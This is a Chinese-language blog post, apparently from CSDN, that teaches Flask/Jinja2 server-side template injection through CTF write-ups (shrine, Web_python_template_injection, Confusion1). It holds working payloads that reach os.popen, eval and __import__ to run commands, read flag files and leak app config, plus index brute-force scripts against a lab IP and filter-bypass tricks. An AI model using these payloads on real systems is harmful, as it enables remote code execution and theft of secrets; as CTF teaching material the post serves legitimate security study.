SSTI(模板注入) 解析 和 ctf 做法

已于 2022-11-22 14:50:46 修改
阅读量2.6k 收藏 40
点赞数 4
分类专栏: python 文章标签: python
于 2022-11-18 21:14:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_56107268/article/details/127927582
版权

基础知识补充:

  • __class__ 返回类型所属的对象
  • __mro__ 返回一个包含对象所继承的基类元组,方法在解析时按照元组的顺序解析。
  • __base__ 返回该对象所继承的基类
  • // __base__和__mro__都是用来寻找基类的
  • __subclasses__ 每个新类都保留了子类的引用,这个方法返回一个类中仍然可用的的引用的列表
  • __init__ 类的初始化方法
  • __globals__ 对包含函数全局变量的字典的引用
  • __builtins__  导入内置函数,例如eval()等

一般ssti都是通过 类->基类->危险函数的使用来实现注入的

 [].__class__         获取[] 对应的类

 [].__class__.__base__           获取[]对应的类的基类

 [].__class__.base__.__subclasses__()     获取[]对应的类的基类的所有子类

 [].__class__.base__.__subclasses__()[30]('flag').read()  (假设<type file> file方法是第30,使用read()方法来读取flag文件)

 [].__class__.base__.__subclasses__()[50].__init__.__globals__['os'].system('ls')  (假设os类是第50个,初始化它并使用system函数来执行ls命令)

SSTI读取文件

python2中可以使用file类来读取文件

{{[].__class__.__base__.__subclasses__()[40]('flag').read()}}

 python3中没有file类了

可以使用<class '_frozen_importlib_external.FileLoader'>,<class ‘click.utils.LazyFile’>

<class ‘codecs.IncrementalEncoder’>来读取文件

python脚本

import requests
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.52'}
for i in range(500):
    url = "http://61.147.171.105:63900/{{().__class__.__base__.__subclasses__()["+str(i)+"]}}"
    res = requests.get(url=url, headers=headers)
    if 'click.utils.LazyFile' in res.text:
       print(i)



payload:{{[].__class__.__base__.__subclasses__()[257]('flag').read()}}

 SSTI执行命令

可以用来执行命令的类有很多,其基本原理就是遍历含有eval函数即os模块的子类,利用这些子类中的eval函数即os模块执行命令。

寻找内建函数 eval 执行命令

查询有内置函数eval的类

import requests
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.52'}
for i in range(500):
    url = "http://61.147.171.105:63900/{{().__class__.__base__.__subclasses__()["+str(i)+"].__init__.__globals__['__builtins__']}}"
    res = requests.get(url=url, headers=headers)
    if 'eval' in res.text:
       print(i)

payload:{{[].__class__.__base__.__subclasses__()[58].__init__.__globals__['__builtins__']['eval']('__import__("os").popen("ls").read()')}}

 寻找 os 模块执行命令

Python的 os 模块中有system和popen这两个函数可用来执行命令。其中system()函数执行命令是没有回显的,我们可以使用system()函数配合curl外带数据;popen()函数执行命令有回显。所以比较常用的函数为popen()函数,而当popen()函数被过滤掉时,可以使用system()函数代替

寻找有os模块的类

import requests
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.52'}
for i in range(500):
    url = "http://61.147.171.105:63900/{{().__class__.__base__.__subclasses__()["+str(i)+"].__init__.__globals__}}"
    res = requests.get(url=url, headers=headers)
    if 'os.py' in res.text:
       print(i)


payload:{{[].__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].popen('ls').read()}}

寻找 importlib 类执行命令 

Python 中存在 <class '_frozen_importlib.BuiltinImporter'> 类,目的就是提供 Python 中 import 语句的实现(以及 __import__ 函数)。我么可以直接利用该类中的load_module将os模块导入,从而使用 os 模块执行命令。

也可以搜索__import__函数来导入os模块

import requests
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.52'}
for i in range(500):
    url = "http://61.147.171.105:63900/{{().__class__.__base__.__subclasses__()["+str(i)+"].__init__.__globals__}}"
    res = requests.get(url=url, headers=headers)
    if '__import__' in res.text:
       print(i)


payload:{{[].__class__.__base__.__subclasses__()[59].__init__.__globals__['__builtins__']['__import__']('os').popen('ls').read()}}

寻找 linecache 函数执行命令

inecache 这个函数可用于读取任意一个文件的某一行,而这个函数中也引入了 os 模块,所以我们也可以利用这个 linecache 函数去执行命令。

import requests
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.52'}
for i in range(500):
    url = "http://61.147.171.105:63900/{{().__class__.__base__.__subclasses__()["+str(i)+"].__init__.__globals__}}"
    res = requests.get(url=url, headers=headers)
    if 'linecache' in res.text:
       print(i)

payload={{[].__class__.__base__.__subclasses__()[59].__init__.__globals__['linecache']['os'].popen('ls').read()}}

config_app 

其中包含应用程序的所有配置值.在大多数情况下,这包括敏感值,例如数据库连接字符串,第三方服务的凭证,SECRET_KEY等。
例如:
url_for, g, request, namespace, lipsum, range, session, dict, get_flashed_messages, cycler, joiner, config等
如果config,self不能使用,要获取配置信息,就必须从它的上部全局变量(访问配置current_app等)

{{url_for.__globals__['current_app'].config.FLAG}}
{{get_flashed_messages.__globals__['current_app'].config.FLAG}}
{{request.application.__self__._get_data_for_json.__globals__['json'].JSONEncoder.default.__globals__['current_app'].config['FLAG']}}

CTF实例

 shrine(xctf)

 url和路由

 app.route()路由可以通过app.route()中的url来访问一个具体的python类或函数

例如:


from flask import Flask

app = Flask(__name__)  # 创建一个flask实例

@app.route('/')
def  index():
    return("这里是/页面")

@app.route('/flag')
def  flag():
    return("这里是falg页面")


if __name__ == '__main__':  # 如果是已主程序的方式启动(不是以导入模块的方式),则运行flask实例
    app.run()  # app.run(debug=True),即可开启debug模式


这里写了两个页面url分别是/ 和 /falg

当然也可以动态的传参以及对参数的过滤

# -*- coding: UTF-8 -*-

from flask import Flask

app = Flask(__name__)  # 创建一个flask实例


@app.route('/')
def a():
    return 1


@app.route('/student/<student_id>/')
def student(student_id):
    return '学生{}号的信息'.format(student_id)


@app.route('/students/<int:student_id>/')
def students(student_id):
    return '学生{}号的信息'.format(student_id)


if __name__ == '__main__':  # 如果是已主程序的方式启动(不是以导入模块的方式),则运行flask实例
    app.run()  # app.run(debug=True),即可开启debug模式

 student 页面中可以随便传参

students页面则只能穿int型数据

 源代码


import flask
import os

app = flask.Flask(__name__)

app.config['FLAG'] = os.environ.pop('FLAG')


@app.route('/')
def index():
    return open(__file__).read()


@app.route('/shrine/<path:shrine>')
def shrine(shrine):

    def safe_jinja(s):
        s = s.replace('(', '').replace(')', '')
        blacklist = ['config', 'self']
        return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s

    return flask.render_template_string(safe_jinja(shrine))


if __name__ == '__main__':
    app.run(debug=True)
app.config['FLAG'] = os.environ.pop('FLAG')

从环境变量中删除FALG变量并返回值给config

 s = s.replace('(', '').replace(')', '')

将() 替换为空

 return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s

将config,self 替换为None

分析:

如果没有过滤config

可以使用{{config.FLAG}}

如果没有过滤self

可以使用{{self.__dict__}},里面有所有字典的键与值

如果没有过滤()

可以使用subclasses()

payload:

url_for.__globals__['current_app'].config.FLAG

(为什么这里的config没有被过滤,不清楚)

Web_python_template_injection

存在ssti注入

 写脚本查询包含有os模块的索引

import requests
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.52'}
for i in range(500):
    url = "http://61.147.171.105:63900/{{().__class__.__base__.__subclasses__()["+str(i)+"].__init__.__globals__}}"
    res = requests.get(url=url, headers=headers)
    if 'os.py' in res.text:
       print(i)

构造payload: 

{{[].__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].popen('ls').read()}}

使用file类读取拿到flag

{{[].__class__.__base__.__subclasses__()[40]('fl4g').read()}}

Confusion1

输入{{2*3}} 结果为6,存在ssti漏洞

 

flag位置给出

发现关键词 class base read 被过滤

  • 使用引号绕过

__class__  ->  ["__cla""ss__"]

构造payload

()["__cla""ss__"]["__ba""se__"]["__subclas""ses__"]()[40]('/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt')["re""ad"]()

拿到flag 

  •  使用request绕过

{{''[request.args.a][request.args.b][2][request.args.c]()[40]('/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt')[request.args.d]()}}?a=__class__&b=__mro__&c=__subclasses__&d=read

坠水
关注
  • 4
    点赞
  • 40
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CTF-SSTI(持续更新)
m0_74317362的博客
07-27 306
SSTI
CTF题型 SSTI(3) Smart SSTI 例题和题记
qq_39947980的博客
03-14 478
前面我们学习了Flask SSTISmart SSTI和Flask SSTI 不同Smart SSTI 是基于php的,居然可以在其中参考 Smart中文手册 https://www.smarty.net/docs/zh_CN/这里我们用 https://www.smarty.net/docs/zh_CN/language.function.eval.tpl#id456693标签{eval}执行任意php代码。
SSTI注入漏洞
最新发布
大河之犬的博客
06-05 985
服务器端模板注入是一种漏洞,当攻击者可以将恶意代码注入到在服务器上执行的模板中时发生Jinja是一种常用的用于Web应用程序的模板引擎。在这段易受攻击的代码中,用户请求中的 name 参数直接通过 render 函数传递到模板中。这可能允许攻击者向 name 参数中注入恶意代码,导致服务器端模板注入。将负载注入到name参数中。此负载可以包含Jinja模板指令,使攻击者能够执行未经授权的代码或操纵模板引擎,潜在地控制服务器。
Bugku CTF——WEB之SSTI学习笔记
qq_51096893的博客
12-19 4336
目录 知识前提 一.题目 二 .理解和学习 三.总结 我们在作为新手去开始进行这些题目的联系的时候只知道一些操作,而不知道原理,这里为新手简单介绍一些SSTI的概念和操作。 知识前提 我们通过实例去一起学习。学习这个之前,我们要知道以下几点: (1)什么是CTF(Capture The Flag) (2)CTF题目类型(我们今天讲解的是WEB类型中注入问题): 1.MISC(Miscellaneous)类型,即安全杂项,题目或涉及流量分析、电子取证、人肉搜索、数据分析等等。 2.P.
CTF_Web:从0学习Flask模板注入SSTI
AFCC_的博客(Web_Dog)
08-30 3608
0x01 前言 最近在刷题的过程中发现服务端模板注入的题目也比较常见,这类注入题目都比较类似,区别就在于不同的框架、不同的过滤规则可能需要的最终payload不一样,本文将以Flask为例学习模板注入的相关知识,也是对自己学习的一个记录。 0x02 Flask简介 Flask是一个Python编写的Web 微框架,让我们可以使用Python语言快速实现一个网站或Web服务。优点就在于开发简单,代码量少,很多工作都在框架中被实现了。他与Django不同于Django是一个全能型框架,通常用于编写大型的网站。
CTF-web-ssti模板注入漏洞
Ye的博客
04-14 921
模板引擎(这里特指用于Web开发的模板引擎)是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,利用模板引擎来生成前端的html代码,模板引擎会提供一套生成html代码的程序,然后只需要获取用户的数据,然后放到渲染函数里,然后生成模板+用户数据的前端html页面,然后反馈给浏览器,呈现在用户面前。SSTI 漏洞是一种常见的 Web 安全漏洞,它允许攻击者在服务器端模板引擎中注入恶意代码,导致服务器执行攻击者控制的代码,可能导致信息泄露、服务器被接管等安全问题。,那么页面上就会显示。
深入浅出带你了解SSTI模板注入
Galaxy_0的博客
02-12 433
深入浅出带你了解SSTI模板注入
CTF模板注入
weixin_43952190的博客
07-30 4192
模板注入赛题 1. [护网杯 2018]easy_tornado 进入后三个链接 /flag.txt # flag in /fllllllllllllag /welcome.txt #提示render(渲染) /hint.txt #提示md5(cookie_secret+md5(filename)) url上两个参数:filename&filehash 根据提示,要查看flag,已经知道了文件名,filehash也知道了构
ssti-payloads::bullseye:服务器端模板注入有效负载
04-13
顾名思义,服务器端模板注入有效负载是在服务器端交付和评估的,这可能使它们比典型的客户端模板注入更加危险。 影响 : 服务器端模板注入漏洞可能使网站遭受各种攻击,具体取决于所讨论的模板引擎以及应用程序...
fenjing工具,ssti
12-17
标题中的“fenjing工具,ssti”指的是Fenjing,一个可能用于安全测试或Web应用漏洞扫描的工具,而“ssti”则是Server-Side Template Injection(服务器端模板注入)的缩写,这是一种常见的Web应用程序安全漏洞。...
tplmap:服务器端模板注入和代码注入检测与开发工具
05-03
Tplmap通过许多沙箱转义技术来帮助利用代码注入和服务器端模板注入漏洞来访问底层操作系统。 开发该工具及其测试套件是为了研究SSTI漏洞类别,并在Web应用程序渗透测试期间用作攻击性安全工具。 沙盒突破技术来自...
gentlexue#POC-3#Apache OfBiz 服务器端模板注入SSTI)1
07-25
Apache OfBiz 服务器端模板注入SSTI)Apache OfBiz 17.12.01容易受到服务器端模板注入SSTI)的影响,从而导致远程代码执行
模板注入与_FLASK.pdf
01-02
模板注入,全称为Server Side Template Injection,是一种常见的Web应用程序安全漏洞,它允许攻击者将恶意输入作为模板字符串的一部分,从而在服务端的模板引擎解析时执行函数调用或命令,可能导致敏感信息泄露、...
CTF模板注入入门学习
weixin_45501486的博客
11-19 107
{{config.__class__.__init__.__globals__['os'].popen('dir').read() }} 对于知识框架的了解,站在巨人的肩膀梭哈大佬文章,很全很nice: https://blog.csdn.net/LYJ20010728/article/details/120205725?ops_request_misc=%257B%2522request%25...
ssti模版注入(看完就会了)
热门推荐
qq_74806534的博客
02-19 2万+
_class__ 类的一个内置属性,表示实例对象的类。__base__ 类型对象的直接基类__bases__ 类型对象的全部基类,以元组形式,类型的实例通常没有属性 __bases____mro__ 此属性是由类组成的元组,在方法解析期间会基于它来查找基类。
CTF—Python考点 SSTI&反序列化&字符串
qi_SJQ_的博客
03-01 3958
ctf题型分类: 1.CTF—Python—支付逻辑&JWT&反序列化: 题目:2019 CISCN 华北赛区Day1 Web2(全国大学生信息安全竞赛) 先写个爆破请求脚本,爬取请求到内容页面哪个存在lv6图片,得到在181页: 或者这个脚本,都可以: import requests url = "http://web44.buuoj.cn/" for i in range(1, 2000): r = requests.get(url + "shop?page=" + st
SSTI模板注入-中括号、args、下划线、单双引号、双大括号被过滤绕过(ctfshow web入门368)
T1ngSh0w的博客
03-29 954
SSTI模板注入漏洞 中括号、args、下划线、单双引号、双大括号被过滤 ctfshow web入门368
ctf系列-bugku靶场 web记录 SSTI 1 2 python flask框架 模板注入
YouthBelief的博客
03-04 788
ctf系列-bugku靶场 web记录Simple_SSTI_1 模板注入SSTI_2 Simple_SSTI_1 模板注入 (1)启动环境 (2)抓包访问链接 发现响应包 显示为python服务 源码 提示 你需要传入一个flag的参数 你知道,在这套flask框架中,我们经常设置一个secret_key 变量 (3)测试flag参数 http://114.67.175.224:17072/?flag={{2*2}} (4)根据提示获取SECRET_KEY变量 http://114.67.175
黑客必杀技能之一,彻底掌握SSTI模板注入漏洞使用方法,如何构造有效载荷?利用攻击载荷达成CTF漏洞静态打桩获取敏感信息远程执行代码,攻击案例实战包括海洋cms,74cms,ofcms等
代码讲故事
12-29 984
黑客必杀技能之一,彻底掌握SSTI模板注入漏洞使用方法,如何构造有效载荷?利用攻击载荷达成CTF漏洞静态打桩获取敏感信息远程执行代码,攻击案例实战包括海洋cms,74cms,ofcms等。 漏洞成因就是服务端接收了用户的恶意输入以后,未经任何处理就将其作为 Web 应用模板内容的一部分,模板引擎在进行目标编译渲染的过程中,执行了用户插入的可以破坏模板的语句,因而可能导致了敏感信息泄露、代码执行、GetShell 等问题。其影响范围主要取决于模版引擎的复杂性。
ssti模板注入payload
09-26
关于SSTI模板注入的payload,这取决于模板引擎的类型和具体的注入点。不同的模板引擎可能具有不同的语法和功能,因此payload的编写也会有所差异。一般来说,payload可以包括以下内容: 1. 利用模板语法执行系统命令...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值